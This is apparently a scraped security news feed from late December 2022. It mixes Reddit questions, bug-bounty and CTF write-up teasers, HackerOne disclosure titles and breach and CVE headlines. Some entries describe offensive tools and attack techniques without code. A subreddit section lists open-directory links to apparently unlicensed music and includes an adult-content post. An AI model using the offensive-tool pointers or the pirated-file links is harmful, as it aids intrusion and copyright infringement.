I received an offer for a network support position (network administrator) at a managed private cloud service provider (VMware, Azure as vendors). I'm currently working at a TAC for a known network vendor, supporting their firewall. I'm worried that this role, being mostly support (a few change requests, policies, VPN tunnels, VLANs, etc.), could be less beneficial from a career perspective than a more generic network engineer role in an enterprise environment (as it would include maintenance, support, planning, deployment, etc.). Please share your opinion on the above worries. Can you switch into an enterprise role easily after a support role at an MSP? How do companies offering contract roles view MSP experience? They highlighted that the role is challenging at least 20 times during two interviews, and that after 6-12 months project work (FW deployments, migrations, etc.) can be requested as well. Tech stack: - Firewalls: Fortinet, Clavister - Cisco ASR Routers - Switches: Arista, Cumulus - VMware NSX - NO Automation, NO SD-WAN. Tickets are highly varied, for example but not limited to: - Change requests - L2/L3 redundancy - IPSec, SSL VPN, interconnects - Generic R/S troubleshooting. submitted by /u/Appropriate_Mind2866
    Can I use a mobile hotspot while using a VPN on my laptop? Or is that less secure than using my broadband connection?
I am currently using my mobile (iPhone) as a hotspot for my laptop, as my regular broadband connection is extremely slow. I enable a VPN (Mullvad) on my laptop, but not my mobile. Is this safe? Do I still have a good amount of privacy? Should I enable the VPN on my phone instead of/alongside my desktop? Is using my regular broadband the more secure option? submitted by /u/notarobot3675
    SOAR Engineer Technical Interview
Hi everyone, I have a "technical interview" coming up for a position as a SOAR (Security Orchestration, Automation & Response) Engineer, and unfortunately the company has given me no information on what tools or topics it could cover. I was wondering if any SOAR Engineers might have some guidance on what I could be doing to best prepare myself? I've got just over a year of experience working as a SOC Analyst and have done some detection content work. Both my current company and the one I am interviewing for use Splunk. It seems like, since SOAR is a relatively new and niche area, information about technical interviews other companies have done is hard to find. If anyone has an experience they could share, it would mean the world to me. I shifted to cyber through a conversion MSc in the UK after many years doing unskilled work, so if anyone has any questions about making that transition, feel free to ask away. Happy to help. I'll post what the interview was like once it's done if anyone is interested. Thanks! submitted by /u/Pretend_Beautiful768
    Best practices for password security
In recent weeks I've been trying to understand the best practices to secure my password information, among other things. So, I would like to have opinions about what you are using, how you back up information, and how you guarantee that, if for some reason you forget a master password, you still have a way to recover access to your accounts. For example: using a pro Bitwarden account on their servers can lead to a problem like LastPass. But if you self-host the server, you can have a breach in your network. Using a 2FA app such as Google, Microsoft, Authy, or even a Yubico key. Using an email address only for recovery on these systems?! What are the best options to have a secure system, with backups and recovery options? Thanks for your help! submitted by /u/matavelhos

    Pass-the-Challenge: Defeating Windows Defender Credential Guard
submitted by /u/ly4k_

DOM XSS Using Web Messages (Practitioner) — Portswigger Lab 1 | Solution and Approach
    No content preview
    Advent of Cyber 4 writeup: A case study in digital forensics and incident response
Digital forensics and incident response is a necessary process for any organisation that is serious about keeping its computers secure! Continue reading on InfoSec Write-ups »
IW Weekly #39: $10,000 Bounty, Zero-click Account Takeover, Stored XSS, Open Redirection…
    No content preview
    Understanding the NumPy Module: Its Use in Cyber Security
    No content preview
    Understanding Memcache Injection
    No content preview
    Performing Security Gap Analysis using Breach & Attack Simulation (BAS) Tools
    Continuous Testing and Auditing - Purple Teaming Activity Continue reading on InfoSec Write-ups »
    Advent of Cyber 2022 [Day 1 — Day 24] All Challenges Walkthrough and Writeups with Answers by…
    No content preview
    Understanding the Scapy Module: Its Use in Cyber Security
    No content preview
    Endpoint Security: The Protection Mechanism of Web Application and Networks
    Introduction Continue reading on InfoSec Write-ups »
    Securing your Linux server with these best practices
    Introduction Continue reading on InfoSec Write-ups »

    SecWiki News 2022-12-26 Review
2022 security architecture summary and 2023 security outlook, by ourren; Automated remediation of authorization-bypass vulnerabilities in practice, by ourren; SecWiki Weekly (issue 460), by ourren. For more of the latest articles, visit SecWiki.

    How to test for JWT attacks?
Hi everyone, in this blog I will try to summarize JWT attacks. Continue reading on Medium »
    Bug is found in Production ?
    If a bug is found in production, below are what I would consider unfair vs fair questions to ask. Continue reading on Medium »
    Infosec career-paths: Penetration Tester
Hello all, today we will discuss another career in Infosec, i.e. Continue reading on Medium »
    CSRF: The Silent Web Attack
    CSRF: The Stealthy Web Attack You Need to Know About Continue reading on Medium »
How I found my first bug.
Greetings everyone, I’m Koroush (aka whiteOwl). This is a quick write-up about how I was able to find my first bug with Google dorking… Continue reading on Medium »
    15,000 Consumers are Impacted by the TPG Telecom Cyberattack in Australia
One of Australia’s top fixed broadband providers is TPG. TPG provides goods supported by top-notch fiber and next-generation networks. Continue reading on Bug Zero »
    Authentication Bypass in Nexus manager (version 3.37.3–02)
    How I found Improper access control in Sonatype nexus manager. Continue reading on Medium »

    OSINT frameworks
    OSINT, or Open Source INTelligence, is the practice of collecting, analyzing, and disseminating information from publicly available… Continue reading on Medium »
    Review: WGMY OSINT Writeup #1
This is the sequel to the WGMY article. Continue reading on Medium »
    OSINT 101: The Essential Guide to Protecting Your Business and Yourself.
    What is OSINT? Continue reading on Medium »
    10 Best OSINT Research Tools for Threat Intelligence
    OSINT (Open Source Intelligence) refers to the practice of gathering, analyzing, and using publicly available information for intelligence… Continue reading on Medium »

Red vs. blue: blinding Windows Defender
Microsoft Defender Antivirus is available in Windows 10, Windows 11 and Windows Server editions.
FreeBuf Morning Report | Over 90% of Chinese enterprises to raise security budgets in 2023; NIO's CEO speaks again on the data breach
On December 25, CEO Li Bin said of the data breach that NIO would "absolutely not compromise", adding "even if the company goes bankrupt paying for it, we will not compromise on this matter."
How to use Autobloody to automatically exploit Active Directory privilege escalation paths shown by BloodHound
Autobloody is a security review tool for Active Directory that lets researchers escalate privileges along the AD privilege escalation paths discovered by a BloodHound scan.
Will cybersecurity players in 2023 "cool off" as fast as ibuprofen brings down a fever?
As a primary-market investor in the cybersecurity industry, I offer a year-end summary of this year's dismal cybersecurity market, and have also invited the heads of two well-known industry companies to share their views on the industry.
US Congress passes bill banning TikTok on government devices
On December 23 local time, the US Congress passed a spending bill that includes a ban on installing TikTok on government devices.
[1 day to go] Preview the highlights: Beike SRC meets you online!
Plenty of substance and giveaways are ready; see you on 12/27! If you haven't registered yet, hurry up and join!
Attacker steals and sells data on 400 million Twitter users, including former US president Trump
The attacker also provided a sample of 1,000 accounts as proof, which included the account data of former US president Trump.

    CVE-2022-46689: Proof-of-concept app to overwrite fonts on iOS
    Article URL: https://github.com/zhuowei/WDBFontOverwrite Comments URL: https://news.ycombinator.com/item?id=34137290 Points: 1 # Comments: 0

    Late HackTheBox Walkthrough
Summary: Late is a Linux machine and is considered an easy box by Hack The Box. On this box, we will begin with

    CVE-2022-43552: HTTP Proxy deny use-after-free
    curl disclosed a bug submitted by bagder: https://hackerone.com/reports/1764858
Account takeover - improper validation of JWT signature (with regard to the expiration date claim)
    Linktree disclosed a bug submitted by twelvesix: https://hackerone.com/reports/1760403 - Bounty: $2500

    The Windows Process Journey — wininit.exe (Windows Start-Up Application)
submitted by /u/boutnaru
    Introduction to Digital Forensics and Incident Response | TryHackMe DFIR
submitted by /u/MotasemHa

    Tools and Techniques for Red Team
    Tools and Techniques for Red Team / Penetration Testing Continue reading on Medium »

Vulnerabilities and exploitation in the Linux kernel network scheduler: privilege escalation from a dedicated SLAB
Authors: Wang Xiaodong, Liu Yong (360 Vulnerability Research Institute). Original link: https://vul.360.net/archives/600 Background: The u32 filter Overview. Module: net/sched/cls_u32.c Ugly (or Universal) 32bit key Packet Classifier. Introduction to Linux TC (traffic control) Li...

    KERBEROASTING Active directory
submitted by /u/Clement_Tino

    The Harvester
theHarvester is a tool developed in Python. Using it you can gather information like emails, subdomains, hosts, employee names… Continue reading on Medium »
    2022 #OSINT Journalism Review
    So, the year is almost over. I look back nostalgically on an exciting and educational 360 days. It’s time again for an end-of-the-season… Continue reading on Medium »
    2022 #OSINT Journalism Review
So. The year is almost over. I look back wistfully on 360 exciting and educational days. It's time again for an end-of-the-season… Continue reading on Medium »
    SPY NEWS: 2022 — Week 51
    Summary of the espionage-related news stories for the Week 51 (December 18–24) of 2022. Continue reading on Medium »
    The Role of Open Source Intelligence in Military Operations
    Open source intelligence (OSINT) is an essential tool for military organizations looking to gather and analyze information, plan and… Continue reading on Medium »

    iPhone vs Pixel security?
Which one is more secure against APTs? iPhone has been hacked by Pegasus repeatedly. It would be easier for a closed-source operating system to implement backdoors, IMHO. Google, on the other hand, is famous for data collection. But it’s got better software people. Pixel comes with Chrome, more secure than Safari IMHO. Any idea? submitted by /u/chaplin2

    GCPGoat(ine) GCP CTF solution Scenario 1 (SSRF and source code review)
    Hi readers, here we will be deploying and solving the GCPGoat module 1 challenge. Continue reading on Medium »
    Red Team or Penetration Approach
    In any cyber engagement, whether it’s a legal red teaming maneuver or a black hat crime like exploiting unauthorized devices, fraud, or… Continue reading on Medium »

    Internal Machine THM
    This is a write-up I wrote a while ago and just found in my files, so I said let’s publish it; maybe it interests someone. I just put the… Continue reading on Medium »
    Find Hidden URLs EASILY!
    A hidden URL (web address) is a URL that is not visible or easily accessible to users on a website. Hidden URLs may be used for a variety… Continue reading on Medium »

    SecWiki News 2022-12-25 Review
    Hopper: modeling and detecting lateral movement attacks, by ourren. For more of the latest articles, visit SecWiki.

    FreeBuf Morning Report | Hackers sell a database of 400 million Twitter users; ByteDance admits accessing journalists' TikTok data
    The US Congress passed an appropriations bill that includes a ban on installing TikTok on government devices; the bill takes effect once President Biden signs it.
    How to use S3cret Scanner to search public S3 Buckets for sensitive information
    S3cret Scanner is a security scanning tool for S3 Buckets; with its help, researchers can easily scan for sensitive information uploaded to public S3 Buckets.
    Shennina: an automated host penetration tool with artificial intelligence
    Shennina is a powerful automated host penetration/exploitation framework that fully automates security scanning, vulnerability scanning/analysis and exploit development.

    Why I love RegRipper
    Yes, yes, I know...you're probably thinking, "you wrote it, dude", and while that's true, that's not the reason why I really love RegRipper. Yes, it's my "baby", but there's so much more to it than that. For me, it's about flexibility and utility. At the beginning of 2020, there was an issue with the core Perl module that RegRipper is built on...all of the time stamps were coming back as all zeros. So, I tracked down the individual line of code in the specific module, and changed it...then recompiled the EXEs and updated the Github repo. Boom. Done. I've written plugins during investigations, based on new things I found, and I've turned around working plugins in under an hour for folks who've reached out with a concise request and sample data. When I've seen something on social media, or s…

    nextcloudcmd incorrectly trusts bad TLS certificates
    Nextcloud disclosed a bug submitted by tobiaskaminsky: https://hackerone.com/reports/1699740
    Talk Android broadcast receiver is not protected by broadcastPermission allowing malicious apps to communicate
    Nextcloud disclosed a bug submitted by andyscherzinger: https://hackerone.com/reports/1596459
    Developer Mistake
    MTN Group disclosed a bug submitted by coyemerald: https://hackerone.com/reports/1058135
    Exposure Of Admin Username & Password
    MTN Group disclosed a bug submitted by coyemerald: https://hackerone.com/reports/1703733

    “I’m selling data of 400M Twitter users that was scraped via a vulnerability”
    Article URL: https://breached.vc/Thread-Selling-Twitter-Data-Breach-400-million-users Comments URL: https://news.ycombinator.com/item?id=34125843 Points: 461 # Comments: 255

    Overview of Glibc Heap Exploitation Techniques (currently up to v2.34)
    submitted by /u/himeko98

    Bug Bounty
    I learned exploit development/vulnerability research and I want to earn money from this. Right now I really don’t know where I can start. I want to hunt C/C++ source code/executables. Please help me! submitted by /u/Z0rch3r
    Analyzing CVE-2022-23093
    submitted by /u/DLLCoolJ

    Feeling sad about Maxi Jazz - https://www.abc.net.au/news/2022-12-25/faithless-singer-maxi-jazz-dies/101808066
    None of these are at parent directory and at least 1 is a pearoast http://media.d7tv.com/BPN/mus/Faithless/ https://master255.org/res/Wanted/F/Faithless/ https://sinj.com/17/dance/ http://b1g-arch1ve.buho.ch/trance/_UNSORTED_B/Trance%20and%20Dance/ Fuck it - let's add to the list https://bear.seedhost.eu/ayrshiredj/website/Stuff/Music/Mashups/ http://www.ossh.com/midi/sound/pop/ http://kadak.mrak.cz/mp3/V.A.%20-%20%20HUST19/PART3/ Pretty sure that last one is one I've posted recently. submitted by /u/ringofyre
    A timely reminder on why we have RULE 5
    be OD poster post normal non re-encoded OD link be copyright botherer (more than likely a bot), find normal OD post REEEE, subMods remove link plz for contravening the Digital Millennium copyright act!!11!! be rest of sub "oh noes, a link is lost to the bad guys!" be OD poster "teehee - I'm going to hide this precious OD link with base 2056 encoding & hash it with md5000" be copyright botherer, find weird looking 'link' REEE!!11!! - REDDIT PLZ REMOVE SUB FOR TRYING TO HIDE LINKS THAT CONTRAVENE DCMA be rest of sub This subreddit has been banned for breaking Reddit's Rules. submitted by /u/ringofyre
    even MORE coloring pages :]
    submitted by /u/lambda077
    Let’s try this again, with all new content. More pics and videos of us, late 30s early 40s dad bod (chunky) and mom bod (curvy) in various acts.
    The last folder we shared got views, a couple of comments, a couple of them not so happy we were there, but many more who followed us and explained that they enjoyed what they saw. So, we’ll try this again. Please make sure to try to drop us a DM or comment here if we had any kind of positive effect. submitted by /u/nosnebn6
    Several Movies
    158:003 submitted by /u/Naul_696
    Went looking for Shelter (90's hardcore-ish band). Didn't find a lot. Found a shitload of weird and wonderful music etc. instead... Prophylactic [NSFW] - haven't had a good look so better to be safe...
    https://www.frequence7.net/son/ https://www.uvm.edu/~ngotelli/ https://teresadapraiamidis.com/Mp3/ https://phapthihoi.org/kinh/Audio/ http://167.114.174.132:9092/ https://jacobsm.com/geedryve/ https://www.dhammatalks.org/Archive/ https://djmzone.info/Samples/ https://www.olliehalsall.co.uk/download/ http://80s.lt/Files/ let's see if this works: /u/ODScanner EDIT: guess not! submitted by /u/ringofyre

    Race conditions : bug bounties
    Race condition vulnerabilities, in my opinion, are one of the most interesting web vulnerabilities. They arise from the simplest mistakes… Continue reading on Medium »
    Bypassing SSRF Protections
    Hello, Continue reading on Medium »
    Hello world — Notes from a hacking newbie
    Greetings Medium readers, I'm Mister Impossible, a wannabe ethical hacker / bug bounty hunter from England in the United Kingdom and this… Continue reading on Medium »
    CRLF Injection — xxx$ — How was it possible for me to earn a bounty with the Cloudflare WAF?
    I recently discovered a CRLF injection vulnerability on a popular website. In this blog post, I will describe the vulnerability and the… Continue reading on InfoSec Write-ups »
    Bypass Apple’s redirection process with the dot (“.”) character
    Hi guys, I have been gone for a while but now I’m back and here is a new write-up post. Today, I’m gonna show you the Open Redirection… Continue reading on InfoSec Write-ups »
    CAN BUG BOUNTY REPLACE PENTESTING
    Security flaws are a serious issue for all software engineers and the organizations that employ them. Many flaws are inconvenient but… Continue reading on Medium »
    How I hacked into police and pivoted attack to RCE
    Let’s breach in guys. So there was a section for the appreciation letters on the site which has public appreciation letters of police, which has… Continue reading on Medium »
    How to earn $2500 a month through Bug bounty [Kurdish languages]
    First of all, greetings. I am Ahmad Abdullah from (Cyber Shield). In this article I want to tell you how to become a successful bug bounty hunter… Continue reading on Medium »

    High-Severity Vulnerability at Kyverno
    Article URL: https://www.armosec.io/blog/cve-2022-47633-kyvernos-container-image-signature-verification/ Comments URL: https://news.ycombinator.com/item?id=34120172 Points: 1 # Comments: 0
    ENLBufferPwn: A vulnerability for several Nintendo 3DS, Wii U, Switch games
    Article URL: https://github.com/PabloMK7/ENLBufferPwn Comments URL: https://news.ycombinator.com/item?id=34117119 Points: 2 # Comments: 1
    Critical Remote Code Execution Vulnerability in Spnego Security Mechanism
    Article URL: https://securityintelligence.com/posts/critical-remote-code-execution-vulnerability-spnego-extended-negotiation-security-mechanism/ Comments URL: https://news.ycombinator.com/item?id=34112681 Points: 1 # Comments: 0

    Pythonic Malware Part-3: In-Memory Execution and Modern Evasion
    Forget compiling payloads and operating on disk — this post demonstrates the use of Python’s portable interpreter for in-memory malware… Continue reading on InfoSec Write-ups »
    CRLF Injection — xxx$ — How was it possible for me to earn a bounty with the Cloudflare WAF?
    I recently discovered a CRLF injection vulnerability on a popular website. In this blog post, I will describe the vulnerability and the… Continue reading on InfoSec Write-ups »
    Know Your Adversary: Cuba Ransomware
    No content preview
    Bypass Apple’s redirection process with the dot (“.”) character
    No content preview

    Do you tell people if you’re a pen tester irl?
    I’m at the stage where I don’t know if mentioning it will make people worried due to the skill set. Layer 8 misunderstandings. submitted by /u/Waddup_yall
    Keeping the latest LastPass breach in mind, is it safer to use password managers without entering the URL of the site or the name of that site?
    I am not an expert when it comes to security, but recently I have been omitting the URL and name of the site when creating a record in my password manager (not LastPass) because I am a bit paranoid. I usually name the record something else entirely and I am pretty good at remembering which gibberish name maps to which site. Is this a more secure way to save passwords using password managers? I mean, if an attacker ends up breaching my password manager's database and, let's say, somehow gets unencrypted data, the attacker still doesn't know where to enter it, so this approach should be slightly more secure, right? Or am I putting in extra effort for no reason? submitted by /u/gmercer25

    WGMY OSINT Writeup #1
    Usually at the end of the year, Wargames.MY is held. This CTF is the creme de la creme of Malaysian CTFs, with a huge pool of participants and cash… Continue reading on Medium »

    SecWiki News 2022-12-24 Review
    OA-EXPTOOL: an OA comprehensive exploitation tool, by 路人甲. Intranet penetration from zero to one: the SMB protocol, by 路人甲. For more of the latest articles, visit SecWiki.

    Backdoor HackTheBox Walkthrough
    Summary: Backdoor is a Linux machine and is considered an easy box on Hack The Box. On this box we will begin with a basic

    Information Disclosure Leads To User Data Leak
    MTN Group disclosed a bug submitted by netboy: https://hackerone.com/reports/1541660
    mysql credentials exposed on - https://cz.acronis.com/docker-compose.yml
    Acronis disclosed a bug submitted by melar_dev: https://hackerone.com/reports/963384 - Bounty: $150

    Exploit MS17–010 without Metasploit
    Introduction Continue reading on Medium »

    You’re doing pentesting wrong.
    You have all the testing tools and processes: SAST, DAST, pentesting, vulnerability disclosure program (bug bounty). But why are there… Continue reading on Medium »

    Qicai on Compliance | A brief overview of MPL 2.0
    Qicai on Compliance is a new content section launched by 棱镜七彩, covering open source compliance basics, translations of common licenses, common compliance Q&A and other modules.
    Endpoint Security Miscellany (2): Market & Users
    Preface: the opening of this miscellany listed a pile of tables; although they are not the latest for 2022, they are still usable. I write as thoughts come; later I will make separate notes on the different topics I know about, and if you have ideas I hope we can discuss them together. Everything described currently only concerns non-classified environments.

    Linux kernel module generator for Hidden firewall that follows the rules in the external YAML file.
    submitted by /u/CoolerVoid

    Why is this Yara rules regular expression not matching when looking at PE Header?
    Hello, I'm wondering if someone more familiar with Yara than I am can tell me why my regex is not working in this rule. I have verified that the field in the particular file does contain characters that this would normally match. I have tested the regex to just match on file content and it works. I do not receive any errors, it just doesn't match; I have tried multiple versions of yara 4.2 and later. Here is an example of what it should match in this field: https://regex101.com/r/M5QEHj/1 import "pe" rule regex_test { condition: pe.version_info["OriginalFilename"] matches /\p{Cyrillic}/ } submitted by /u/KING_WINSOME
    Is a backdoor a simpler explanation for an apparent zero-click attack on high-profile targets (Pegasus)?
    Clarification. By backdoor I mean, for example, the OS developer deliberately leaving vulnerabilities, sharing them with a front organization (NSO Group) which could then develop the spyware (Pegasus) based on them and offer it to intelligence agencies of friendly governments. Questions. Would this process be easier than just executing a zero-click attack? This might work for Apple with iOS but I don’t know how difficult it would be for Google to introduce vulnerabilities and let them go unnoticed for a long time in Android, which is open source. Does the incident of the polkit privilege escalation vulnerability being unnoticed for 12 years show that it could also be possible to do with Android? Motivation. (This is unrelated to this sub but I'm just adding this so that people could understand why I'm asking this.) First, revelations of PRISM showed that both intelligence agencies and all the major OS developers for smartphones would be willing to collaborate on such a program. Second, this strategy would make it safer for both since it would limit the number of insiders who are aware of this and also offer them plausible deniability in case the front is caught. They could have multiple fronts working at the same time which can undergo closure/prosecution and be replaced as and when they are caught. submitted by /u/vinamrsachdeva
    How to select a MDR/MSSP partner (evaluation criteria)?
    Hi guys, we are planning to further improve our IT security by integrating an XDR/MDR solution into our infrastructure (10 global locations, 1800 endpoints, 40 physical hosts, 600 virtual servers). Our IT team needs to focus on adding value to the business (a mid-sized tooling manufacturer in Europe), so we are looking for an MDR/MSSP partner with a good reputation to take over this role. Can anyone share online resources, white papers, or personal experiences on criteria for evaluating and comparing MDR/MSSP service offerings? submitted by /u/gerhardmpl
    Need help with configuring AlienVault
    I've installed it on a virtual machine. I've set it up but I'm unable to access the web interface. Probably some issue with the IPs while setting up. Can anyone help me out? It's a university project. submitted by /u/Baki_Hanma69
    Distance based wifi antennas
    Pardon my ignorance. Can someone point me to a device, antenna, or a combo that can reach far? I have a wifi network on the other side of a hallway outside the building I need to reach. It's a two room hallway, not very big in width, but it's solid concrete. The wifi signal is about 50-100m outside the window and I need to reach it. Can I get some suggestions, or be pointed to where I can research my needs to reach this wifi? If this isn't the right subreddit, can I be pointed correctly? Thank you kindly submitted by /u/donttouchmyhohos
    Vulnerability Management Automation
    Howdy, I am interested in automating vulnerability management processes. So the idea is to have as little human interaction as possible, meaning report sharing or Jira tickets are created automatically for the responsible teams. Anyone have any tips or experience? Thanks submitted by /u/hannibal_the_general
    VPN Block by Gov. in Iran
    Title explains everything; below is more info: They adopted a new (maybe new to me) system of blocking VPNs from working. How that works, I don't know, but everything works fine until you turn on the VPN and suddenly you get timeouts every 4 seconds. There are some VPNs that use protocols to evade it, but they're not available on iOS, only applicable on PC. I don't have an IT education background. I just gather some info on the internet just like others. So I can't give more specific info on packets and connections etc. I wanted to know if there is any way to backdoor this sort of censorship? Any help appreciated. Extra: I have 2 paid VPN subs (Express & Windscribe). Edit: Solved. submitted by /u/No-Magician-4361
    How come LastPass doesn’t encrypt website URLs when they store vault data in the cloud?
    https://blog.lastpass.com/2022/12/notice-of-recent-security-incident/ submitted by /u/Capable-Mongoose
    Worried about my email and number being related to digital footprint
    Hey, so I just learned about this digital footprint stuff off of TikTok, and it’s worrying me. I am a theater actor, and just got verified on Instagram. I’m worried people can find my accounts now. I have posted stuff to r/confession on here about some personal stuff (which was with an old email and is deleted now); is it as good as gone? I’m worried about people finding it, since it’s personal. I had two old emails and used them for burner accounts; if I delete them will it help? And should I get rid of my new email? I use mobile Reddit and social media; I hate that my privacy is out to see. Any advice on how to get rid of those posts and Google searches? None of these emails have my name in them though. submitted by /u/Haunting-Ad-6267

    The Linux Process Journey — “md” (Multiple Device Driver)
    submitted by /u/boutnaru
    What is pixel math tag?
    I am doing my school project to determine if my suspect is guilty of owning, accessing and distributing illegal content. I found this URL in the browsing history of my suspect's disk image on Autopsy. I know there is one Reddit post about it, but that is 6 years old. There are mentions of it as a malware link or a MediaMath website, which is a digital advertising company. Does anyone know what it is exactly? When I opened the link, it is just a blank page. Open it at your own risk... URL: https://pixel.mathtag.com/sync/iframe?mt_uuid=e8c15864-67e3-4600-915d-27917d2d316d&no_iframe=1&mt_adid=176084 submitted by /u/AlienDumpling
    Export Whatsapp chat with replies from an iPhone
    I'm trying to export a WhatsApp chat from an iPhone XR with iOS 15.6 including replies to messages. I tried to explore the ChatStorage.sqlite db to understand how it works, but it's very "messy"! After a while, I succeeded in understanding how it works, but I really can't understand how WhatsApp stores replies to messages. The only thing I noticed is that whenever a message is a reply to another message (also when a media item is attached to a message, so, more generally, whenever the "graphic thing" is on top of a message), in the ZWAMESSAGE table under the ZMEDIAITEM column a value appears, which is the Z_PK value of an entry in the ZWAMEDIAITEM table. Unfortunately this last table seems to only show information about messages with media, as every message that should be a reply has nearly every value set to null in this table. I also tried googling a bit, but I couldn't find anything. Could you help me to understand replies in the WhatsApp database please? submitted by /u/Crihexe
    Recovering Deleted Files Using FTK Imager
    How do you recover deleted files using the FTK Imager tool? Please describe the process step-by-step in the most straightforward manner possible. submitted by /u/Suspicious_Cheek_873

    $350 XSS in 15 minutes
    Bug Bounty Writeup about DOM XSS via JSONP + Parameter pollution Continue reading on Medium »
    How these IDOR vulnerability earned 5000$ | Hackerone Reddit Bug Bounty
    Modifying any user's custom profile links Continue reading on InfoSec Write-ups »
    Katana Framework: How To Use It To Scan And Mass Collect Website Data
    Hi guys 🙏, today we will see the installation and basic usage of the Katana tool. Continue reading on Medium »
    OTP Bypassing and Vulnerabilities from E-Mail fields.
    What is Authentication? Continue reading on Medium »
    Bug Zero at a Glance [Weeks 10–16 and 17–23 December]
    What happened with Bug Zero? Continue reading on Bug Zero »
    Starting Bug Bounty from Scratch
    Start with basics! Continue reading on Medium »
    Top 7 Tips to Succeed in Bug Bounty Programs
    Writing a technical write-up for a bug bounty program can be a daunting task, especially if you are new to the field of cybersecurity… Continue reading on Medium »
    The Masa Bug Bounty program is now open
    Masa is officially launching our ongoing bug bounty program, which is now open to community participation. We also… Continue reading on Medium »

    Fast OSINT with Social Analyzer and 1,000+ social networks — Install and webapp
    Continue reading on Medium »
    Geolocation OSINT
    A while ago I received the photo above from friends, sent from their holiday address. Curious as I was, I wanted to use my OSINT… Continue reading on Medium »

    PyRDP 1.2.0 released – Can perform Net-NTLM hash capture before the certificate error on RDP
    submitted by /u/obilodeau
    FIN7 Unveiled - A deep dive into notorious cybercrime gang
    submitted by /u/wtfse
    Introducing the Columbus Project
    submitted by /u/g0rbe

    How these IDOR vulnerability earned 5000$ | Hackerone Reddit Bug Bounty
    No content preview
    Advent of Cyber 2022 [Day 22] Attack Surface | Reduction Threats are failing all around me-Simple…
    No content preview
    Everything about Docker Security
    Photo by Hacker Noon on Unsplash Continue reading on InfoSec Write-ups »
    ❗️Capture The Ether ❗️— Token Sale [Difficulty = Low-Medium]
    No content preview
    Advent of Cyber 2022 [Day 23] Defence in Depth | Mission ELFPossible: Abominable for a Day-Simple…
    No content preview

    SecWiki News 2022-12-23 Review
    The road to automated code auditing with CodeQL (part 2), by ourren. ENRE: an extensible entity-relationship extraction framework tool, by ourren. Product management methodology (part 3): the logic of planning & the architecture of R&D, by ourren. Product management methodology (part 2), by ourren. Product management methodology (part 1), by ourren. For more of the latest articles, visit SecWiki.

    RatInject — Red Team Tool
    Introduction Continue reading on Medium »

    SlowMist: Analysis of large-scale phishing of NFT users by a North Korean APT group
    This article analyzes only a portion of the NFT phishing material and distills some of the phishing characteristics of the North Korean hackers.
    Apache ShardingSphere-Proxy MySQL authentication bypass vulnerability (CVE-2022-45347)
    After a failed MySQL client authentication, ShardingSphere-Proxy does not fully clear the session; an attacker can bypass authentication and execute SQL statements by constructing a special MySQL client.
    Network security architecture: system-layer security
    The network security architecture diagram is organized according to existing network security requirements and presented across multiple dimensions.
    FreeBuf Weekly | Alibaba Cloud Hong Kong servers suffer an "epic" outage; NIO hit by a ransom attack
    A summary of this week's hot news, security incidents, good reads and handy tools, so you don't miss any of this week's highlights!
    Betting company BetMGM suffers a data breach; "gamblers" face cyber risk
    Well-known sports betting company BetMGM suffered a data breach in which a threat actor successfully stole a large amount of users' personal information.
    LastPass incident investigation: hackers stole vault data via a cloud storage breach
    The threat actor copied basic customer account information and related metadata, including company names, end-user names, billing addresses, email addresses and phone numbers.

    FuzzingWeekly CW 51: How Fuzzing Helped Me Get My First Bounty
    How Fuzzing Helped Me to Get My First Bounty: https://infosecwriteups.com/how-fuzzing-helps-me-to-get-my-first-bounty-2c63eb864e08 Continue reading on Medium »

    Fuzzing helped me get my first bounty: Fuzzing Weekly CW 51
    Article URL: https://ioc.exchange/@FuzzingWeekly/109562456353714356 Comments URL: https://news.ycombinator.com/item?id=34104179 Points: 1 # Comments: 0

    Secret API Key is logged in cleartext
    Omise disclosed a bug submitted by sim4n6: https://hackerone.com/reports/1662194 - Bounty: $200
    xss due to incorrect handling of postmessages
    Khan Academy disclosed a bug submitted by moom825: https://hackerone.com/reports/1758132

    StealthHook - a method of hooking functions without modifying memory protection
    Author: The_Itach1@知道创宇404实验室 Date: 2022-12-23. I recently read an article by x86matthew on hooking methods, https://www.x86matthew.com/view_post?id=stealth_hook. Compared with some traditional hooking approaches, I personally think StealthHook's biggest advantage is not that it avoids modifying memory protection but its stealth: this hooking method is hard to detect, because it does not directly...

    Ask HN: How can a game with a big vulnerability still be sold?
    https://www.cvedetails.com/cve/CVE-2018-10718 https://www.cvedetails.com/cve/CVE-2019-20893/ https://steamcommunity.com/id/Wackiiy/recommended/10180/ Or is this a past thing and fixed? I have not found any info that it has been fixed. Comments URL: https://news.ycombinator.com/item?id=34101899 Points: 3 # Comments: 0

    Threat Brief: OWASSRF Vulnerability Exploitation
    We analyze the new exploit method for Microsoft Exchange Server, OWASSRF, noting that all exploit attempts we've observed use the same PowerShell backdoor, which we track as SilverArrow. Read the details and learn how to mitigate. The post Threat Brief: OWASSRF Vulnerability Exploitation appeared first on Unit 42.


    [Hiring] InfoSec Assurance Roles in USA and Europe
    submitted by /u/RecruitingAdmin
    Lastpass Security Incident - December 22 update
    submitted by /u/tkokilroy
    Attack of the clones - Stealthy Kubernetes persistence with eathar, tòcan and teisteanas
    submitted by /u/raesene2
    [x-post from blueteamsec] I started a newsletter that aggregates Detection Engineering news and techniques. Here’s the latest Issue. Let me know what you think!
    submitted by /u/dudeimawizard
    Cross-tenant network bypass in Azure Cognitive Search
    submitted by /u/FrankTr3nd
    GLPI Exploitation Timeline
    submitted by /u/chicksdigthelongrun
    Puckungfu: A NETGEAR WAN Command Injection
    Yet another Pwn2Own vulnerability patched days before the competition (https://twitter.com/_mccaulay/status/1605886785015480320) submitted by /u/ArbitraryWrite

    Linux Kernel Ksmbd Use-After-Free Remote Code Execution Vulnerability
    Article URL: https://www.zerodayinitiative.com/advisories/ZDI-22-1690/ Comments URL: https://news.ycombinator.com/item?id=34098804 Points: 59 # Comments: 37
    Critical Microsoft Code-Execution Vulnerability
    Article URL: https://www.schneier.com/blog/archives/2022/12/critical-microsoft-code-execution-vulnerability.html Comments URL: https://news.ycombinator.com/item?id=34092892 Points: 7 # Comments: 0

    OSINT
    OSINT, short for open-source intelligence, is data that has been obtained from publicly available sources. OSINT is widely used by law… Continue reading on Medium »
    Ghyophoggua DEVS ARE FOOL!
    The best way to prevent a Hecker is to make unique Directory ex Continue reading on Medium »
    PAI Research Process, part 3
    Be aware of your own cognitive biases and do not be so set in your ways that you resist trying new processes. Continue reading on Medium »
    Best OSINT Tools and Resources for Hacker
    OSINT Framework — https://osintframework.com/ Continue reading on Medium »

    Forensic Tool to Analyze PST / Mailboxes
